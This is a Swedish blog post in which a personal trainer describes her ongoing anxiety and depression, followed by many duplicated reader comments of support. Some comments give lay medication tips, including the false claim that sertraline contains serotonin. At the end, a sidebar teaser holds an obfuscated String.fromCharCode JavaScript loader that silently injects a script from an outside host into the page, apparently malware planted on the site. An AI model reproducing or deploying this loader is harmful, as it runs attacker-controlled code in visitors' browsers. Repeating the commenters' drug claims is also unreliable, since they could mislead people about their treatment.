När mörkret kommer. Ångest och depression.

Hej mina vänner!

Åh! Jag VET hur kass jag varit på att skriva här inne senaste tiden 🙈 Förlåt! ( samt, att svara på samtal och sms 😖)

Men precis som med det mesta andra, så finns det en förklaring till detta! Jag har ett bra flow i jobb, träning osv 🙏🏻

Men min energi är på BOTTEN! Det är en bedrift att bara komma upp ur sängen….. Att jag funkar och kommer upp är tack vare min Lilleman ❤️ Det är någonting inom mig som han plocka fram. När energin inte finns och ångesten är brutal så får min Lilleman mig att fungera ändå 🙏🏻

Ni som följt mig länge vet att jag kraschade in i den berömda väggen för snart 5 år sedan . Mycket har blivit mycket bättre såklart! ☺️

Men jag är inte ”tillbaka” som förut. Långt ifrån faktiskt! Just nu mår jag inte så bra….. Privat.

Jag brottas med en ångest som är brutal! Ångest är h*lvete just nu! Det är såklart svårt att förstå om man aldrig upplevt det…. Smärtan gör så fruktansvärt ont.

Det är också svårt att se på utsidan om någon inte mår bra. För det syns ju lixom inte på utsidan…

Har du en bruten arm eller ett gipsat ben osv, då förstår man det direkt.

Plus att jag har blivit expert på att ”kliva in” i en roll när jag tex jobbar, eller pratat med en vän😅Men bakom den fasaden så pågår en inte kamp. En kamp för att orka gå upp, en kamp för att hantera ångesten, och en fight för att få MÅ BRA! ❤️

Just nu är jag låg….. och det är helt okay. För jag vet att det kommer bättre dagar och perioder 🙏🏻 Jag vet det…. Men det tar inte bort känslan jag har just nu.

-Varför tar jag upp detta?

Jo, för bakom alla fasader och speciellt alla tillrättalagda ”perfekta” Instagram/blogg flöden så finns en verklighet 🙏🏻 Min verklighet är brokig, kantstött och långt ifrån perfekt!

När jag mår som sämst försöker jag att påminna mig om följande :

❤️ jag har världens finaste sambo och son ❤️

💪🏻 Att jag älskar mitt jobb, som tränare och coach. ( finns inget som får mig att må så bra som att se mina klienter må sina mål🙏🏻❤️)

🌟Att jag har en jätte fin PT studio som jag lyckats köpa och bygga upp helt själv.

Jag är tacksam för så mycket saker och påminner mig om dessa om och om igen…. Men TROTS det så mår jag inte så bra.

Vilket går att jag även känner mig väldig ensam i just det. Ensamheten kommer som ett brev på Posten med ångest och depression !

Just därför vill jag dela med mig av detta…. för jag VET att jag är långt ifrån ensam om att uppleva det här🙏🏻 ”Psykisk ohälsa” är ett tabubelagt ämne….

Men om jag kan hjälpa en enda människa att känna sig mindre ensam genom att läsa mina rader …. Så är det värt det för mig! ❤️

Det tar emot att öppet dela med mig av hur jag mår. Då jag själv är rädd för att bli ”dömd” . Det hade varit enklare att själv gömma mig bakom en ”fasad” , vilket jag gör bland! MEN, man ska inte behöva skämmas över hur man mår.

Mitt liv innehåller delar av allt, glädje, sorg, skratt och gråt. Högt och lågt, men just nu så är jag i en svacka där både ångest och depressionen har ett stadigt grepp om mig ! #trött

PS: jag tänker att jag kör en ofiltrerad blogg ett tag…. För när jag mår såhär så finns det två allternativ. Att inte blogga alls. Eller som nu, vara ärlig! ❤️

68 Komentarer

 1. Varför köra filter överhuvudtaget för då är verkligheten förskönad. Jag skulle aldrig lägga ett filter på mig själv eller mitt barn för vi ser ju ut som vi gör och att visa andra att man inte kan stå för vanliga bilder ger jag min dotter en käftsmäll att hon inte ser okej ut. Samma när ni lägger ut andra bilder på platser osv…. Varför inte köra en ofiltrerad blogg och visa hur saker/personer ser ut? Det är äkta och vackert ❤️

 2. Tråkigt att du inte mår så bra.Sånt syns ju inte utanpå. När jag var ung för länge länge sen trodde jag att alla som var vackra var självklart lyckliga och jag som var tjock och ful mådde förstås inte så bra. När jag nu ser på kort av mig från den tiden var jag inte alls tjock och inte ful heller. Det tog många många år att bli sams med mig själv och faktiskt gilla mig själv. Kram till dig och din fina familj.

 3. Jag tycker det är bra att du tar upp även när du har dina dalar. Psykisk ohälsa måste det pratas mer om och att alla som genomgår det känner att de inte är ensamma och att man kan prata/skriva om det. Allt är inte en dans på rosor.
  Jag brukar hamna i en höst depp varje år, kommer någonstans i oktober/november.
  Hoppas du snart mår bra och se till att omge dig med människor som får dig att må bra så att tankarna kommer på något annat.
  Kram!

 4. Du gör helt rätt i att vara öppen och ärlig. Har själv mått dåligt i perioder och det lättaste är att låtsas som om allt är bra, trots att man mår skit inombords. Jag har varit rädd att om jag visar hur jag mår så kommer ”allt” att rämna i mitt liv. Men om man öppnar sig får man så mycket omtanke från andra runt omkring en, som gör att man kan hantera smärtan lättare. STOR kram till dig! Kämpa på ❤

 5. Du är inte ensam, kom ihåg det. Vi måste bli bättre på att våga visa våra ”svaga” sidor.
  Jag har/är på samma väg, och inser att jag aldrig blir den jag var före väggen 2019.
  Kram bästa du

 6. Jag vet exakt hur det känns. Äter konstant medicin sedan 1.5 år tillbaka mot just ångest och depression. Har som du ett bra jobb, en familj som jag älskar och som älskar mig- men trots allt kommer skiten emellanåt. Har en fasad som du skriver. Ingen det hur man mår…

 7. Varför köra filter överhuvudtaget för då är verkligheten förskönad. Jag skulle aldrig lägga ett filter på mig själv eller mitt barn för vi ser ju ut som vi gör och att visa andra att man inte kan stå för vanliga bilder ger jag min dotter en käftsmäll att hon inte ser okej ut. Samma när ni lägger ut andra bilder på platser osv…. Varför inte köra en ofiltrerad blogg och visa hur saker/personer ser ut? Det är äkta och vackert ❤️

 8. Tråkigt att du inte mår så bra.Sånt syns ju inte utanpå. När jag var ung för länge länge sen trodde jag att alla som var vackra var självklart lyckliga och jag som var tjock och ful mådde förstås inte så bra. När jag nu ser på kort av mig från den tiden var jag inte alls tjock och inte ful heller. Det tog många många år att bli sams med mig själv och faktiskt gilla mig själv. Kram till dig och din fina familj.

 9. Jag blev utan jobb innan jul. Har varken man eller barn, mor/far. Jag tänker i denna tid att jag får allt det här för att jag är stark och kan hantera det. Varje ny morgon är fantastisk ? Jag mår oxå dåligt, ångest och depp. Men jag biter ihop, hoppas på jobb jag sökt, på en fin vår då jag ska gå i sneakers på långa promenader. Livet.

 10. Jag tycker det är bra att du tar upp även när du har dina dalar. Psykisk ohälsa måste det pratas mer om och att alla som genomgår det känner att de inte är ensamma och att man kan prata/skriva om det. Allt är inte en dans på rosor.
  Jag brukar hamna i en höst depp varje år, kommer någonstans i oktober/november.
  Hoppas du snart mår bra och se till att omge dig med människor som får dig att må bra så att tankarna kommer på något annat.
  Kram!

 11. Jobbigt förståss med dessa dippar. Ångest är svårt att beskriva och kan vara förstå om man inte har upplevt det själv. Depressioner är vanligt idag men hjälp finns att få.
  Nu tycker du att träning är din bästa medicin men skulle verkligen rekommendera dig att komplettera både med antidepressiv och ångestdämpande medicin. Vet att du prövat och att du inte tyckte att det hjälpte dig, du mådde sämre. Ibland kan det vara så att man får pröva olika doser och olika varianter och kan ta tid innan man hittar rätt kombo. Prövas förstås ut i samråd med psykiatriker.
  Att må så dåligt som du verkar göra, under längre perioder som är återkommande är inte hälsosamt. Att du efter många år har börjat återhämtat dig från din utbrändhet betyder inte att du i framtiden slipper leva utan ångest och depressioner. Vet att du har ditt team av olika kompetenser runt dig. Ta upp frågan med din läkare/psykiater igen och tänk noga igenom vad de rekommenderar dig. Själv är inte alltid bästa dräng. Kram

 12. Du gör helt rätt i att vara öppen och ärlig. Har själv mått dåligt i perioder och det lättaste är att låtsas som om allt är bra, trots att man mår skit inombords. Jag har varit rädd att om jag visar hur jag mår så kommer ”allt” att rämna i mitt liv. Men om man öppnar sig får man så mycket omtanke från andra runt omkring en, som gör att man kan hantera smärtan lättare. STOR kram till dig! Kämpa på ❤

 13. Du är inte ensam, kom ihåg det. Vi måste bli bättre på att våga visa våra ”svaga” sidor.

  Jag har/är på samma väg, och inser att jag aldrig blir den jag var före väggen 2019.

  Kram bästa du

 14. Jag vet exakt hur det känns. Äter konstant medicin sedan 1.5 år tillbaka mot just ångest och depression. Har som du ett bra jobb, en familj som jag älskar och som älskar mig- men trots allt kommer skiten emellanåt. Har en fasad som du skriver. Ingen det hur man mår…

 15. Har ett ”perfekt” liv, underbart hus, jobb, man , barn. Men det räcker inte alltid, bara telefonen ringer (som dessutom alltid är på ljudlös pga ångesten) dör man, kommer absolut inte svara ? åt antidepressiva förr i livet men tycker att man blir så seg och likgiltig så har klarat mig utan men äter för pms emellanåt då rullgardinen blir lite väl nere då ?hoppas allt blir bättre ❤️

 16. Jag blev utan jobb innan jul. Har varken man eller barn, mor/far. Jag tänker i denna tid att jag får allt det här för att jag är stark och kan hantera det. Varje ny morgon är fantastisk 🙏 Jag mår oxå dåligt, ångest och depp. Men jag biter ihop, hoppas på jobb jag sökt, på en fin vår då jag ska gå i sneakers på långa promenader. Livet.

 17. Jobbigt förståss med dessa dippar. Ångest är svårt att beskriva och kan vara förstå om man inte har upplevt det själv. Depressioner är vanligt idag men hjälp finns att få.
  Nu tycker du att träning är din bästa medicin men skulle verkligen rekommendera dig att komplettera både med antidepressiv och ångestdämpande medicin. Vet att du prövat och att du inte tyckte att det hjälpte dig, du mådde sämre. Ibland kan det vara så att man får pröva olika doser och olika varianter och kan ta tid innan man hittar rätt kombo. Prövas förstås ut i samråd med psykiatriker.
  Att må så dåligt som du verkar göra, under längre perioder som är återkommande är inte hälsosamt. Att du efter många år har börjat återhämtat dig från din utbrändhet betyder inte att du i framtiden slipper leva utan ångest och depressioner. Vet att du har ditt team av olika kompetenser runt dig. Ta upp frågan med din läkare/psykiater igen och tänk noga igenom vad de rekommenderar dig. Själv är inte alltid bästa dräng. Kram

 18. Sänder masa styrke kramizar. Ja solen kommer för oss alla. Tycker du e helt enorm. Hjärtat på rätt ställe. ❤️❤️❤️❤️❤️❤️

 19. Att äta antidepressiva och ångestdämpande vid behov betyder inte att man ska känna sig seg och likgiltig. Tvärtom ska de hjälpa en att bättra klara sig igenom ångestattacker och depressioner. Att dipparna inte blir så djupa och ångesten lindras. Oftast slipper man inte undan helt men många kan leva som ” normalt” forsätta jobba och se livet lite ljusare. Idag finns det så många olika antidepp mediciner och det som passar för en kanske inte passar för en annan. Därför krävs noga och omfattande utprovning. Inga mirakelmediciner men en god hjälp på vägen när det mesta ser mörkt ut och livet känns tungt trots bra vänner, familj m.m.

 20. Har ett ”perfekt” liv, underbart hus, jobb, man , barn. Men det räcker inte alltid, bara telefonen ringer (som dessutom alltid är på ljudlös pga ångesten) dör man, kommer absolut inte svara 😱 åt antidepressiva förr i livet men tycker att man blir så seg och likgiltig så har klarat mig utan men äter för pms emellanåt då rullgardinen blir lite väl nere då 🥺hoppas allt blir bättre ❤️

 21. Sänder masa styrke kramizar. Ja solen kommer för oss alla. Tycker du e helt enorm. Hjärtat på rätt ställe. ❤️❤️❤️❤️❤️❤️

 22. Att äta antidepressiva och ångestdämpande vid behov betyder inte att man ska känna sig seg och likgiltig. Tvärtom ska de hjälpa en att bättra klara sig igenom ångestattacker och depressioner. Att dipparna inte blir så djupa och ångesten lindras. Oftast slipper man inte undan helt men många kan leva som ” normalt” forsätta jobba och se livet lite ljusare. Idag finns det så många olika antidepp mediciner och det som passar för en kanske inte passar för en annan. Därför krävs noga och omfattande utprovning. Inga mirakelmediciner men en god hjälp på vägen när det mesta ser mörkt ut och livet känns tungt trots bra vänner, familj m.m.

 23. Herregud My! Medicinera!!!
  Jag har också gått på Wemind & fått KBT & hjälp jag mår äntligen bra nu och har trappat ut Voxra och det har gått bra! Håller även på att tappa ut Citalopram! Känner igen mig så väl i vad su skriver! Tacka vet jag hjälp & medicin! Mvh Sara medicinsk sekreterare ❤️

 24. Herregud My! Medicinera!!!
  Jag har också gått på Wemind & fått KBT & hjälp jag mår äntligen bra nu och har trappat ut Voxra och det har gått bra! Håller även på att tappa ut Citalopram! Känner igen mig så väl i vad su skriver! Tacka vet jag hjälp & medicin! Mvh Sara medicinsk sekreterare ❤️

 25. Det är ett hyggligt vanligt tillstånd numer i covidtider. Arbetar inom psykiatrin. Så egentligen helt normalt utifrån de omständigheter vi lever i. Tänk då en lockdown på riktigt eller att vara 70+ Och/eller riskgrupp. Så oavsett om det känns trösterikt eller trivialt så är det inte ”sjukligt”.

  • Jag har lever med detta i många, många år. Långt inmana covid fanns på tapeten.
   Detta är Svårt att beskriva med ord. Jag har själv valt att dela med mig av en viss del av min situation… För att belys ämnet och visa att man inte ska behöva känna sig ensam…
   Jag uppskattar att du tog dig tiden att skriva . Men tyvärr är inte mitt ”tillstånd” en covid depression….
   Mer än så orkar jag inte gå in på just nu ??

 26. Det är ett hyggligt vanligt tillstånd numer i covidtider. Arbetar inom psykiatrin. Så egentligen helt normalt utifrån de omständigheter vi lever i. Tänk då en lockdown på riktigt eller att vara 70+ Och/eller riskgrupp. Så oavsett om det känns trösterikt eller trivialt så är det inte ”sjukligt”.

  • Jag har lever med detta i många, många år. Långt inmana covid fanns på tapeten.

   Detta är Svårt att beskriva med ord. Jag har själv valt att dela med mig av en viss del av min situation… För att belys ämnet och visa att man inte ska behöva känna sig ensam…

   Jag uppskattar att du tog dig tiden att skriva . Men tyvärr är inte mitt ”tillstånd” en covid depression….

   Mer än så orkar jag inte gå in på just nu 🙏🏻

 27. När jag kört slut kroppen då signalerar den med panikattacker,först då lugnar jag ner tempot och försöker vila ,inte alltid så lätt med huvudet fullt med tankar och oro ångest,jag är kompis med min adhd men ibland är det tungt.

 28. När jag kört slut kroppen då signalerar den med panikattacker,först då lugnar jag ner tempot och försöker vila ,inte alltid så lätt med huvudet fullt med tankar och oro ångest,jag är kompis med min adhd men ibland är det tungt.

 29. Kämpa på! Vet inte om du redan äter någon medicin men jag började med Citalopram för flera år sedan pga kronisk värk och nedstämdhet. Mår mycket bättre idag! Träning och kost gör stor skillnad men ibland kan man behöva lite extra hjälp på vägen. Nu vet jag inte om du redan äter någon medicin redan förstås. Tycker även att D-vitamin i hyfsat hög dos gör skillnad. Sömnen är ju superviktigt också så tar alltid magnesium innan jag går och lägger mig.

 30. Obs tänk på att för mager kost påverkar hur du mår psykiskt. Hjärnan behöver fett för att producera serotonin o för mager diet påverkar din psykiska hälsa. Därför passar ex inte Detox många människor, vilket är ett observandum.

  • Jag skulle aldrig ”detoxa” ☺️ jag har stenkoll på min kost… och är utbildad inom ämnet… så min kost är planerar för mig och mina behov . En bra fördelning mellan protein, kolhydrater, fett, fibrer, vitaminer och mineraler… ☺️??

 31. Kämpa på! Vet inte om du redan äter någon medicin men jag började med Citalopram för flera år sedan pga kronisk värk och nedstämdhet. Mår mycket bättre idag! Träning och kost gör stor skillnad men ibland kan man behöva lite extra hjälp på vägen. Nu vet jag inte om du redan äter någon medicin redan förstås. Tycker även att D-vitamin i hyfsat hög dos gör skillnad. Sömnen är ju superviktigt också så tar alltid magnesium innan jag går och lägger mig.

 32. Rosor till Dig som öppet Lämnar ut det svåra! Du är så generös som även i detta så empatiskt vill hjälpa andra…finnas för andra!
  Den här tant H följer Dig alltid…det är jag som trycker på bromsen när Du kör bil! Många, många unga starka, ambitiösa kvinnor…de får det så här!
  Ångest är så stort..komplext men inte oöverstigligt.
  Fina My det kommer att bli bättre-i bland har man helt enkelt för mycket även om det är Goda ting.
  Lycka till! Kram på Dig!

 33. Obs tänk på att för mager kost påverkar hur du mår psykiskt. Hjärnan behöver fett för att producera serotonin o för mager diet påverkar din psykiska hälsa. Därför passar ex inte Detox många människor, vilket är ett observandum.

  • Jag skulle aldrig ”detoxa” ☺️ jag har stenkoll på min kost… och är utbildad inom ämnet… så min kost är planerar för mig och mina behov . En bra fördelning mellan protein, kolhydrater, fett, fibrer, vitaminer och mineraler… ☺️🙏🏻

 34. Rosor till Dig som öppet Lämnar ut det svåra! Du är så generös som även i detta så empatiskt vill hjälpa andra…finnas för andra!
  Den här tant H följer Dig alltid…det är jag som trycker på bromsen när Du kör bil! Många, många unga starka, ambitiösa kvinnor…de får det så här!
  Ångest är så stort..komplext men inte oöverstigligt.
  Fina My det kommer att bli bättre-i bland har man helt enkelt för mycket även om det är Goda ting.
  Lycka till! Kram på Dig!

 35. Hej, känner igen mig ? Har haft mkt ångest och känt mig låg tidigare. Även fast jag haft det bra. Hade svårt att somna och sömnproblem en period, tankarna snurrade. Har nu småbarn och mina sömnproblem har försvunnit ?somnar om på 2 röda, efter varit uppe o tittat till Lillan om natten ? orkar ändå upp på morgonen och fixar frukost och lämnar på förskola. Annat: Efter jag fick barn har jag mindre mensvärk ?Däremot tror jag PMS blivit värre med åren ?! ?Kan känna mig mycket låg innan mens? Så ett tips är, känner du dig låg hela månaden, så är det kanske depression ? eller är det halva månaden ”bara” så kan det vara något med hormonerna ?Vissa p-piller kan också göra en låg har jag själv märkt iaf
  Sen mörker och regn och rusk på det! Stora kramar ??

 36. Hej, känner igen mig 😘 Har haft mkt ångest och känt mig låg tidigare. Även fast jag haft det bra. Hade svårt att somna och sömnproblem en period, tankarna snurrade. Har nu småbarn och mina sömnproblem har försvunnit 😃somnar om på 2 röda, efter varit uppe o tittat till Lillan om natten 😂 orkar ändå upp på morgonen och fixar frukost och lämnar på förskola. Annat: Efter jag fick barn har jag mindre mensvärk 🤔Däremot tror jag PMS blivit värre med åren ?! 😬Kan känna mig mycket låg innan mens😪 Så ett tips är, känner du dig låg hela månaden, så är det kanske depression 🥺 eller är det halva månaden ”bara” så kan det vara något med hormonerna 😙Vissa p-piller kan också göra en låg har jag själv märkt iaf
  Sen mörker och regn och rusk på det! Stora kramar 😍🤗

 37. En massa kramar till dig, jag vet hur det är. Att må bra är det ända man vill och få njuta av det fina man har. Det kommer bättre dagar det vet vi ❤️

 38. En massa kramar till dig, jag vet hur det är. Att må bra är det ända man vill och få njuta av det fina man har. Det kommer bättre dagar det vet vi ❤️

 39. Jag vet hur det är att känna sig ensam har haft utmattningsdepression sedan 2017 och dom riktigt dåliga dagarna önskar man verkligen någon som förstår hur det är…
  Så starkt av dig att dela med dig❤️Kram till dig

 40. Jag vet hur det är att känna sig ensam har haft utmattningsdepression sedan 2017 och dom riktigt dåliga dagarna önskar man verkligen någon som förstår hur det är…
  Så starkt av dig att dela med dig❤️Kram till dig

 41. Du är så jäla stark i o med att du berättar allt! Jag fattar inte hur du lyckas trolla ihop allting med mat o matlådor, Lilleman, dina kunder med egenträning mm. Mm. Att allt klaffar med hyra lokal sedan köpa lokal mm. Köpa bil o bostad. Du är helt enkelt bara BÄST! Önskar dig lycks till med allt!

 42. Du är så jäla stark i o med att du berättar allt! Jag fattar inte hur du lyckas trolla ihop allting med mat o matlådor, Lilleman, dina kunder med egenträning mm. Mm. Att allt klaffar med hyra lokal sedan köpa lokal mm. Köpa bil o bostad. Du är helt enkelt bara BÄST! Önskar dig lycks till med allt!

 43. Jag har varit sjukskriven för utmattning i ett år nu och på slutet har jag börjat äta setralin mot ångest. Det innehåller seratonin som är kroppens eget må bra hormon. Var tidigare motståndare till att äta medecin men jag säger bara wow vilken skillnad! Tar en ganska låg dos så den tar inte bort alla symptom men den tar bort värsta ångesten och de lägsta dalarna. Tog nån månad innan kroppen vant sig och just då hade jag ökade symptom men det hade min läkare också förvarnat om. Men nu är det så stor skillnad på att orka med vardagen. För ångest tar sån energi och har man en gång varit i utmattning så har man så små reserver.

 44. Jag har varit sjukskriven för utmattning i ett år nu och på slutet har jag börjat äta setralin mot ångest. Det innehåller seratonin som är kroppens eget må bra hormon. Var tidigare motståndare till att äta medecin men jag säger bara wow vilken skillnad! Tar en ganska låg dos så den tar inte bort alla symptom men den tar bort värsta ångesten och de lägsta dalarna. Tog nån månad innan kroppen vant sig och just då hade jag ökade symptom men det hade min läkare också förvarnat om. Men nu är det så stor skillnad på att orka med vardagen. För ångest tar sån energi och har man en gång varit i utmattning så har man så små reserver.

 45. Jag har också en dålig period nu med ångest. Vaknar varje morgon och tänker ”hur ska jag orka igenom ännu en dag”. Det är så jäkla tungt. ? Vill bara försvinna ur min egen kropp, men det finns ju ingenstans att fly till…
  Försöker tänka på att det har känts såhär förut, det blev bättre och det kommer bli bra igen. Måste bara orka kämpa sig igenom denna period…

 46. Jag har också en dålig period nu med ångest. Vaknar varje morgon och tänker ”hur ska jag orka igenom ännu en dag”. Det är så jäkla tungt. 😩 Vill bara försvinna ur min egen kropp, men det finns ju ingenstans att fly till…
  Försöker tänka på att det har känts såhär förut, det blev bättre och det kommer bli bra igen. Måste bara orka kämpa sig igenom denna period…

 47. Så starkt att du berättar och som
  Du säger att vem trodde att man fortfarande skulle må dåligt 5 år in i utmattningen❤️
  Vi kämpar på 🙏
  Kram

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/